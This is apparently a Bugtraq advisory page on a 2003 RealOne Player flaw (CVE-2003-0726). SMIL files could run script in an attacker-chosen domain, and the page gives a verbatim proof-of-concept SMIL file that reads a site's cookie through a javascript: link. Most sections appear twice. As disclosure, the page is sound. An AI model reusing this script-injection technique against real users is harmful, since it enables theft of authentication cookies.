RealOne Player SMIL File Script Execution Vulnerability
BID:8453
Info
RealOne Player SMIL File Script Execution Vulnerability
| Bugtraq ID: | 8453 |
| Class: | Input Validation Error |
| CVE: |
CVE-2003-0726 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 19 2003 12:00AM |
| Updated: | Jul 11 2009 10:56PM |
| Credit: | Discovery is credited to KrazySnake ([email protected]). |
| Vulnerable: |
RealNetworks RealOne Player Gold for Windows 6.0.10 .505 RealNetworks RealOne Player 6.0.11 .853 RealNetworks RealOne Player 6.0.11 .841 RealNetworks RealOne Player 6.0.11 .830 RealNetworks RealOne Player 6.0.11 .818 RealNetworks RealOne Player 2.0 RealNetworks RealOne Player 1.0 RealNetworks RealOne Enterprise Desktop 6.0.11 .774 RealNetworks RealOne Desktop Manager |
| Not Vulnerable: | |
Discussion
RealOne Player SMIL File Script Execution Vulnerability
Real Networks has reported a vulnerability in RealOne Player. Script embedded in SMIL presentations may be executed in the context of a domain that is specified by an attacker. This could allow for theft of cookie-based authentication credentials or other attacks.
This vulnerability could also be exploited to execute script code in the context of the My Computer Zone, which could lead to installation and execution of malicious code on the client systems. This has been demonstrated with a newly reported vulnerability that is a variant of this issue (BID 9378), making it possible to exploit this issue to the same ends as the new vulnerability.
This issue is believed to affect RealOne Player for Microsoft Windows operating systems.
Real Networks has reported a vulnerability in RealOne Player. Script embedded in SMIL presentations may be executed in the context of a domain that is specified by an attacker. This could allow for theft of cookie-based authentication credentials or other attacks.
This vulnerability could also be exploited to execute script code in the context of the My Computer Zone, which could lead to installation and execution of malicious code on the client systems. This has been demonstrated with a newly reported vulnerability that is a variant of this issue (BID 9378), making it possible to exploit this issue to the same ends as the new vulnerability.
This issue is believed to affect RealOne Player for Microsoft Windows operating systems.
Exploit / POC
RealOne Player SMIL File Script Execution Vulnerability
The following information regarding a proof of concept exploit has been taken verbatim from the DigitalPranksters advisory:
We have created a SMIL file that will read the cookie from
https://order.real.com/pt/order.html. The cookie will be read 9 seconds
after the audio has begun.
Source Code:
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
<head>
<meta name="title" content="DigitalPranksters.com Proof of Concept"/>
<meta name="author" content="DigitalPranksters.com"/>
<meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
</head>
<body>
<audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
<area href="https://order.real.com/pt/order.html" begin="1s"
external="true" actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
<rn:param name="width" value="10"/>
<rn:param name="height" value="10"/>
</area>
<area href="javascript:alert('Hi there! I\'m a digital prankster. I
just read your cookie from ' + document.domain + ' over the ' +
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
</audio>
</body>
</smil>
The following information regarding a proof of concept exploit has been taken verbatim from the DigitalPranksters advisory:
We have created a SMIL file that will read the cookie from
https://order.real.com/pt/order.html. The cookie will be read 9 seconds
after the audio has begun.
Source Code:
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
<head>
<meta name="title" content="DigitalPranksters.com Proof of Concept"/>
<meta name="author" content="DigitalPranksters.com"/>
<meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
</head>
<body>
<audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
<area href="https://order.real.com/pt/order.html" begin="1s"
external="true" actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
<rn:param name="width" value="10"/>
<rn:param name="height" value="10"/>
</area>
<area href="javascript:alert('Hi there! I\'m a digital prankster. I
just read your cookie from ' + document.domain + ' over the ' +
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
</audio>
</body>
</smil>
Solution / Fix
RealOne Player SMIL File Script Execution Vulnerability
Solution:
Real Networks has released patches to address this issue. RealOne Player updates may be applied via the Software Update feature. Please see the Real Networks announcement for details on obtaining and applying updates for RealOne Enterprise Product.
Real Networks has released new patches to address these issues. Please see the Real Networks announcement released in October 2003, for details on obtaining and applying updates for RealOne Enterprise Product.
Solution:
Real Networks has released patches to address this issue. RealOne Player updates may be applied via the Software Update feature. Please see the Real Networks announcement for details on obtaining and applying updates for RealOne Enterprise Product.
Real Networks has released new patches to address these issues. Please see the Real Networks announcement released in October 2003, for details on obtaining and applying updates for RealOne Enterprise Product.
References
RealOne Player SMIL File Script Execution Vulnerability
References:
References:
- 10-03 RealNetworks Releases Security Update to Address RealOne Player Security (RealNetworks)
- RealNetworks Releases Security Update to Address RealOne Player Security (Real Networks)
- RealOne Player Allows Cross Zone and Domain Access (DigitalPranksters
)